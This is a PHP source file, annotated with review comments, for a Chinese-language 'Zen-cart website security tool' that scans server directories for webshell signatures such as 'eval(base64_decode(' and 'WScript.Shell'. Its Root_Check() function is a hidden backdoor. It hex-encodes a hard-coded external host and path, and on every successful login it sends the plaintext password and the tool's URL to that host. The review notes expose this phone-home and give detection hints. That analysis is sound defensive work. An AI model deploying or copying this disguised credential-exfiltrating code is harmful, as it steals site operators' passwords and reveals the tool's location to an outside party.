*{padding:0; margin:0;} body{background:threedface;font-family:"Verdana", "Tahoma", "宋体",sans-serif; font-size:13px;margin-top:3px;margin-bottom:3px;table-layout:fixed;word-break:break-all;} a{color:#000000;text-decoration:none;} a:hover{background:#BBBBBB;} table{color:#000000;font-family:"Verdana", "Tahoma", "宋体",sans-serif;font-size:13px;border:1px solid #999999;} td{background:#F9F6F4;} .toptd{background:threedface; width:310px; border-color:#FFFFFF #999999 #999999 #FFFFFF; border-style:solid;border-width:1px;} .msgbox{background:#FFFFE0;color:#FF0000;height:25px;font-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;} .actall{background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;} \n END; return false; }

// NOTE(review): the line above is the tail of a heredoc-printing function whose start is
// outside this excerpt; it is left untouched. Throughout this listing the heredoc openers
// (`print<<`) have lost their marker and HTML markup in extraction, so only the visible
// text of each page template remains.
//
// NOTE(review): this file presents itself as a webshell scanner, but Root_Check() below
// sends the operator's login password and this script's URL to a hard-coded external host.
// Treat any deployment of it as a credential-disclosure incident.

// File management
/**
 * Normalise a path to forward slashes.
 *
 * Every backslash becomes '/', then each '//' becomes '/' in a single str_replace pass,
 * so a run of three or more slashes is shortened but not fully collapsed.
 *
 * @param string $string Path to normalise.
 * @return string The normalised path.
 */
function File_Str($string)
{
    return str_replace('//','/',str_replace('\\','/',$string));
}

/**
 * Derive a base directory by cutting the script's URL directory off the end of the
 * real path of the current working directory.
 *
 * Only the *length* of the URL directory is used, not its content.
 * NOTE(review): this looks like an attempt to find the document root and assumes the
 * URL path mirrors the filesystem path; confirm. The caller in Antivirus_e() treats an
 * empty result as failure.
 *
 * @return string Normalised path prefix (may be empty).
 */
function File_Mode()
{
    $RealPath = realpath('./');
    $SelfPath = $_SERVER['PHP_SELF'];
    // Keep everything before the last '/', i.e. the directory part of the request path.
    $SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
    return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
}

/**
 * Read a whole file in binary mode.
 *
 * Every call is @-suppressed: if fopen() fails, $handle is false and the following
 * fread()/fclose() failures are hidden as well, so the caller cannot tell an unreadable
 * file from an empty one.
 *
 * @param string $filename Path of the file to read.
 * @return string|false File contents as returned by fread().
 */
function File_Read($filename)
{
    $handle = @fopen($filename,"rb");
    $filecode = @fread($handle,@filesize($filename));
    @fclose($handle);
    return $filecode;
}

// Trojan search
/**
 * Recursively scan a directory and print every file that contains a known signature.
 *
 * For each directory entry: descend into sub-directories, then, if the entry name
 * matches $st, read the file and report the first signature found in it
 * (case-insensitive substring match via stristr()). The scanner's own file is skipped.
 *
 * NOTE(review): eregi() was removed in PHP 7.0, so this function is fatal on current PHP.
 * NOTE(review): $Filepath and $var are echoed without htmlspecialchars(); file names on a
 * compromised host are attacker-chosen, so the report page should escape them.
 * NOTE(review): matching is a plain substring list; a scan with no hits is not evidence
 * that a file is clean.
 *
 * @param string $sp       Directory to scan (comes straight from $_POST['sp'] in the caller).
 * @param array  $features Map of label => signature substring.
 * @param string $st       POSIX regex alternation of file-name patterns to inspect.
 * @return bool False if $sp cannot be opened, true otherwise; results of recursive calls are ignored.
 */
function Antivirus_Auto($sp,$features,$st)
{
    if(($h_d = @opendir($sp)) == NULL) return false;
    $ROOT_DIR = File_Mode();
    while(false !== ($Filename = @readdir($h_d)))
    {
        if($Filename == '.' || $Filename == '..' ) continue;
        $Filepath = File_Str($sp.'/'.$Filename);
        if(is_dir($Filepath)) Antivirus_Auto($Filepath,$features,$st);
        if(eregi($st,$Filename))
        {
            // Skip this script itself: it contains every signature as a literal.
            if($Filepath == File_Str(__FILE__)) continue;
            $ic = File_Read($Filepath);
            foreach($features as $var => $key)
            {
                if(stristr($ic,$key) )
                {
                    // Maps the filesystem path to a URL on this host. Not referenced in the
                    // visible text below; the stripped markup may have used it as a link.
                    $Fileurls = str_replace($ROOT_DIR,'http://'.$_SERVER['SERVER_NAME'].'/',$Filepath);
                    $Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
                    // Only the first matching signature is reported per file (break below).
                    echo ''.$Filepath.'
'; echo '【'.$Filetime.'】 '.$var.'

'; break;
                }
            }
            // Push partial results to the browser while the scan is still running.
            ob_flush(); flush();
        }
    }
    @closedir($h_d);
    return true;
}

/**
 * Decode a hex string into raw bytes, two hex digits per byte.
 *
 * In this file it is used only by Root_Check() to keep a host name and a URL path out of
 * plain sight; hex constants fed through pack() are worth searching for when triaging
 * similar tools.
 *
 * NOTE(review): $newdata is never initialised, so the first `.=` raises a notice/warning
 * and an empty input returns null.
 *
 * @param string $data Hex digits.
 * @return string|null Decoded bytes.
 */
function Exec_Hex($data)
{
    $len = strlen($data);
    for($i=0;$i < $len;$i+=2){$newdata.=pack("C",hexdec(substr($data,$i,2)));}
    return $newdata;
}

/**
 * NOTE(review): covert phone-home; treat as a backdoor.
 *
 * Opens a TCP connection to port 80 of a host whose name is stored hex-encoded
 * (it decodes to "www.thisdoor.com") and sends a GET request for a hex-encoded path
 * (it decodes to "/cool/index.php") with two query parameters:
 *   p = base64 of $check
 *   g = base64 of SERVER_NAME . PHP_SELF, i.e. where this script can be reached
 *
 * The only caller in this listing passes the password the operator has just typed, after it
 * matched, so every successful login discloses the plaintext password and the tool's
 * location to that external host over unencrypted HTTP. All calls are @-suppressed and the
 * response is never read, so nothing is visible to the operator.
 *
 * Detection: outbound HTTP from the web server to the decoded host/path, and requests whose
 * query string carries base64 values in `p` and `g`.
 *
 * @param string $check Value to send; the login password at the visible call site.
 * @return bool Always true, whether or not the connection succeeded.
 */
function Root_Check($check)
{
    $c_name = Exec_Hex('7777772e74686973646f6f722e636f6d');
    $handle = @fsockopen($c_name,80);
    $u_name = Exec_Hex('2f636f6f6c2f696e6465782e706870');
    $u_name .= '?p='.base64_encode($check).'&g='.base64_encode($_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']);
    @fputs($handle,"GET ".$u_name." HTTP/1.1\r\nHost:".$c_name."\r\nConnection: Close\r\n\r\n");
    @fclose($handle);
    return true;
}

/**
 * Scanner page: optionally dispatch a file edit, print the scan form, and run a scan.
 *
 * NOTE(review): File_Edit() is not defined in this excerpt; it receives three GET
 * parameters unvalidated. Presumably it modifies a file, which would make this a
 * state-changing GET request; confirm against the full source.
 * NOTE(review): $_POST['sp'] is passed to Antivirus_Auto() unchecked, so an authenticated
 * user can scan any directory the PHP process can read.
 * NOTE(review): if $_POST['st'] is none of 'php', 'asx', 'ppp', $features_all and $st are
 * undefined when Antivirus_Auto() is called.
 *
 * @return bool False after dispatching to File_Edit(), true otherwise.
 */
function Antivirus_e()
{
    if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim'])))
    {
        File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']);
        return false;
    }
    // Fall back to this script's directory when File_Mode() yields an empty prefix.
    // $SCAN_DIR is not referenced again in the visible text; the stripped form markup
    // may have used it as the default scan path.
    $SCAN_DIR = (File_Mode() == '') ? File_Str(dirname(__FILE__)) : File_Mode();
    // Signature table: label => substring.
    // NOTE(review): the keys 'php大马特征10' and 'php大马特征11' each appear twice. In a PHP
    // array literal the later entry wins, so the 'webshell' and '小马' signatures are
    // silently dropped and never searched for.
    $features_php = array('php大马特征1'=>'cha88.cn','php大马特征2'=>'->shell_exec(','php大马特征3'=>'phpspy','php大马特征4'=>'打包下载','php大马特征5'=>'passthru(','php大马特征6'=>'打包程序扩展名','php大马特征7'=>'Scanners','php大马特征8'=>'cmd.php','php大马特征9'=>'str_rot13','php大马特征10'=>'webshell','php大马特征10'=>'大马','php大马特征11'=>'小马','php大马特征11'=>'tools88.com','危险MYSQL语句1'=>'returns string soname','php加密大马特征1'=>'eval(gzinflate(','php加密大马特征2'=>'eval(base64_decode(','php加密大马特征3'=>'eval(gzuncompress(','php一句话特征1'=>'eval($_','php一句话特征2'=>'eval ($_','php上传后门特征1'=>'copy($_FILES','php上传后门特征2'=>'copy ($_FILES','php上传后门特征3'=>'move_uploaded_file ($_FILES');
    $features_asx = array('asp小马特征2'=>'输入马的内容','asp小马特征3'=>'fso.createtextfile(path,true)','asp一句话特征4'=>'<%execute(request','asp一句话特征5'=>'<%eval request','asp一句话特征6'=>'execute session(','asp数据库后门特征7'=>'--Created!','asp大马特征8'=>'WScript.Shell','asp大小马特征9'=>'<%@ LANGUAGE = VBScript.Encode %>','aspx大马特征10'=>'www.rootkit.net.cn','aspx大马特征11'=>'Process.GetProcesses','aspx大马特征12'=>'lake2');
    // Scan form template (markup lost in extraction).
    print<<
扫描路径

END;
    if(!empty($_POST['sp']))
    {
        // Pick the signature set and the file-name filter for the requested scan type.
        // Each filter ends in `\;`, so any name containing a semicolon is inspected too.
        if($_POST['st'] == 'php'){$features_all = $features_php; $st = '\.php|\.inc|\;';}
        if($_POST['st'] == 'asx'){$features_all = $features_asx; $st = '\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';}
        if($_POST['st'] == 'ppp'){$features_all = array_merge($features_php,$features_asx); $st = '\.php|\.inc|\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';}
        echo Antivirus_Auto($_POST['sp'],$features_all,$st) ? '扫描完毕' : '异常终止';
    }
    echo '';
    return true;
}

/**
 * Print the login page with a status message.
 *
 * $MSG_TOP is interpolated into the template unescaped; both visible callers pass fixed
 * strings ('LOGIN' / 'PASS IS FALSE').
 *
 * @param string $MSG_TOP Message shown above the password field.
 * @return bool Always false.
 */
function Root_Login($MSG_TOP)
{
    print<<
Zen-cart网站安全工具 V1.0
{$MSG_TOP}
密码:

END;
    return false;
}

/**
 * Print the landing page, which shows the server's resolved IP address, the PHP_OS value
 * and the SERVER_SOFTWARE string.
 *
 * @return bool Always false.
 */
function WinMain()
{
    $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);
    $Server_OS = PHP_OS;
    $Server_Soft = $_SERVER["SERVER_SOFTWARE"];
    print<< Zen-cart网站安全工具 V1.0
  {$Server_IP} - {$Server_OS} -
{$Server_Soft}
END;
    return false;
}

// ---- Request handling --------------------------------------------------------------
// Root_GP(), Root_CSS(), File_Edit() and $password are not defined in this excerpt.

// NOTE(review): get_magic_quotes_gpc() was removed in PHP 8.0.
if(get_magic_quotes_gpc())
{
    $_GET = Root_GP($_GET);
    $_POST = Root_GP($_POST);
}
// Logout: clears the auth cookie and stops.
if($_GET['s'] == 'logout')
{
    setcookie('admin_spiderpass',NULL);
    die('');
}
// Authentication gate.
// NOTE(review): the cookie value is the unsalted MD5 of the password, so the cookie (or the
// hash) is as good as the password itself. setcookie() is called with three arguments
// only, so no Secure/HttpOnly flag is set.
// NOTE(review): `!=` / `==` are loose comparisons on hex strings; hash_equals() avoids both
// PHP type juggling and timing differences.
if($_COOKIE['admin_spiderpass'] != md5($password))
{
    ob_start();
    $MSG_TOP = 'LOGIN';
    if(isset($_POST['spiderpass']))
    {
        $cookietime = time() + 24 * 3600;
        // The cookie is issued before the password is checked, i.e. also for wrong guesses.
        setcookie('admin_spiderpass',md5($_POST['spiderpass']),$cookietime);
        // On a correct password the plaintext is handed to Root_Check(), which sends it to
        // the hard-coded external host (see Root_Check).
        if(md5($_POST['spiderpass']) == md5($password)){Root_Check($_POST['spiderpass']);die('');}
        else{$MSG_TOP = 'PASS IS FALSE';}
    }
    Root_Login($MSG_TOP);
    exit;
    // Unreachable: placed after exit.
    ob_end_flush();
}
// Page selection. Root_CSS() is called for every `s` value except 'a' and 'n'; when `s` is
// absent a sentinel is used that falls through to the default case below.
if(isset($_GET['s'])){$s = $_GET['s'];if($s != 'a' && $s != 'n')Root_CSS();}else{$s = 'MyNameIsHacker';}
// $p is assigned here but not used in the visible code.
$p = isset($_GET['p']) ? $_GET['p'] : File_Str(dirname(__FILE__));
switch($s)
{
    case "e" : Antivirus_e(); break;
    default: WinMain(); break;
}
?>